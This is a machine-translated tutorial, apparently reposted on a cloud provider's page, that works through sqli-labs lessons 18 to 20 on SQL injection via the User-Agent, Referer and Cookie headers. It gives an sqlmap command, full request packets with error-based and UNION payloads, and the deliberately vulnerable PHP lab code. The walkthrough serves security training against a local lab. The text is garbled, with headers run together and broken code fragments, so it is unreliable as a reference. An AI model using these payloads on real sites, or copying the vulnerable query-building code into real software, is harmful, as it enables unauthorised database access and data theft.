"Mysql SQL Inject" "Getting Started" Sqli-labs using Part 4 "18-20"

Source: Internet
Author: User

These points of injection point generation are mostly located at the HTTP header location

Common HTTP injection points are generated in "Referer", "X-forwarded-for", "Cookie", "X-real-ip", "Accept-language", "Authorization";

    • Less-18 Header Injection-error based-string

1) Tool Usage:
The injection point is at user-agent, so use the Sqlmap-r parameter to save the requested test packet to 1. txt, and then add an * number to the User-agent field. Then enter the following command to use the tool injection

      • Sqlmap-r 1.txt–current-db–threads 10–batch–technique Best

Test packet 1. txt

post/hacker/sqli-labs-master/less-18/index.php http/1.1host:127.0.0.1user-agent:mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) gecko/20100101 firefox/47.0*accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, DEFLATEREFERER:HTTP://127.0.0.1/ hacker/sqli-labs-master/less-18/index.phpconnection:closecontent-type:application/ x-www-form-urlencodedcontent-length:38 Uname=admin&passwd=admin&submit=submit

  

2) Manual Injection
Before the field of all, as long as there are errors back to appear, matching a good single quotation mark can be directly used to verify the injection point updatexml-Error statement;

post/hacker/sqli-labs-master/less-18/index.php http/1.1host:127.0.0.1user-agent:mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) gecko/20100101 firefox/47.0 ' and Updatexml (1,concat (0x7e,database ()), 1) and ' one ' = ' 11accept:text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q= 0.3accept-encoding:gzip, Deflatereferer:http://127.0.0.1/hacker/sqli-labs-master/less-18/index.phpconnection: closecache-control:max-age=0content-type:application/x-www-form-urlencodedcontent-length:38 uname=admin& Passwd=admin&submit=submit

  

3) Injection Point generation code

Checks if the value is empty, does not empty use the Mysql_real_escape_string function to filter the input value Check_input ($value) {if (!empty ($value)) {//Trunca    tion (see comments) $value = substr ($value, 0, 20);    }//Stripslashes if Magic quotes enabled if (GET_MAGIC_QUOTES_GPC ()) {$value = Stripslashes ($value);    }//Quote if not a number if (!ctype_digit ($value)) {$value = "'". Mysql_real_escape_string ($value). "'";    } else {$value = Intval ($value); } return $value;} $uagent = $_server[' http_user_agent '); $IP = $_server[' remote_addr '];echo "<br>"; Echo ' Your IP address is: '. $IP; echo "<br>";//echo ' Your User Agent is: '. $uagent;//Take The Variablesif (isset ($_post[' uname ']) && isset (    $_post[' passwd ')) {$uname = Check_input ($_post[' uname ']);    $passwd = Check_input ($_post[' passwd ');    Logging the connection parameters to a file for analysis.    $fp = fopen (' Result.txt ', ' a '); Fwrite ($fp, ' User Agent: '. $uname. '    \ n ");    Fclose ($FP); $sql = "Select Users.username, Users.password from the users WHERE users.username= $uname and users.password= $passwd ORDER by users    . ID DESC LIMIT 0,1 ";    $result 1 = mysql_query ($sql);    $row 1 = mysql_fetch_array ($result 1);        if ($row 1) {echo ' <font color= ' #FFFF00 ' font size = 3 > '; $insert = "INSERT INTO ' security '. ' Uagents ' (' uagent ', ' ip_address ', ' username ') VALUES (' $uagent ', ' $IP ', $uname)"; The injection point produces the position mysql_query ($insert);

 

-less-19 Header Injection-referer-error based-string

This point of injection is generated at Referer, mainly for writing with insert statements when not judged.

Referer: ' and (select 1690 from (select COUNT (*), CONCAT (0x716a707171, (MID () ((Ifnull () ((), 0x20), 1,54 ), 0x717a767671,floor (RAND (0) *)) x from INFORMATION_SCHEMA. Character_sets GROUP by X) a) and ' qmqa ' = ' Qmqa

Playload

The injected statement that is used

Full HTTP request Package

post/sqli-labs-master/less-19/http/1.1host:127.0.0.1user-agent:mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) gecko/20100101 firefox/47.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, DEFLATEREFERER:HTTP://127.0.0.1/ sqli-labs-master/less-19/' and Updatexml (1,concat (0x7e,database (), 0x7e), 1) and ' 1 ' = ' 1connection:closecontent-type: Application/x-www-form-urlencodedcontent-length:38uname=admin&passwd=admin&submit=submit

  

Core code

function Check_input ($value) {if (!empty ($value)) {//truncation (see comments) $value = substr ($value,    0, 20);    }//Stripslashes if Magic quotes enabled if (GET_MAGIC_QUOTES_GPC ()) {$value = Stripslashes ($value);    }//Quote if not a number if (!ctype_digit ($value)) {$value = "'". Mysql_real_escape_string ($value). "'";    } else {$value = Intval ($value); } return $value;} $uagent = $_server[' http_referer '); $IP = $_server[' remote_addr '];echo "<br>", Echo ' Your IP address is: '. $IP; echo " <br> ";//echo ' Your User Agent is: '. $uagent;//Take The Variablesif (isset ($_post[' uname ']) && isset ($_post [' passwd ']))    {$uname = Check_input ($_post[' uname ');    $passwd = Check_input ($_post[' passwd ');    $fp = fopen (' Result.txt ', ' a '); Fwrite ($fp, ' Referer: '. $uname. "    \ n ");    Fclose ($FP); $sql = "Select Users.username, Users.password from the users WHERE users.username= $uname and users.password= $passwd ORDER by U SErs.id DESC LIMIT 0,1 ";    $result 1 = mysql_query ($sql);    $row 1 = mysql_fetch_array ($result 1);        if ($row 1) {echo ' <font color= ' #FFFF00 ' font size = 3 > '; $insert = "INSERT INTO ' security '. ' Referers ' (' referer ', ' ip_address ') VALUES (' $uagent ', ' $IP ')"; Injection point Generation mysql_query ($insert);

  

-less-20 Cookie Injection-error based-string
Playload

cookie:dumb-4829 ' UNION all SELECT null,concat (0x7170786271,ifnull (DATABASE () as CHAR), 0x20), 0x7176706271), NULL---

  

Core code

1, receive the user name, password, 2, if correct, set the user name as the cookie value 3, the query database has no relevant user name equals the cookie name 144-147 line code $cookee = Base64_decode ($cookee); echo "< Br></font> "; $sql =" SELECT * from Users WHERE username= (' $cookee ') LIMIT 0,1 "; $result =mysql_query ($sql); 188-189 code echo "Your Cookie is deleted"; Setcookie (' uname ', Base64_encode ($row 1[' username ']), time ()-3600);

  

"Mysql SQL Inject" "Getting Started" Sqli-labs using Part 4 "18-20"

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.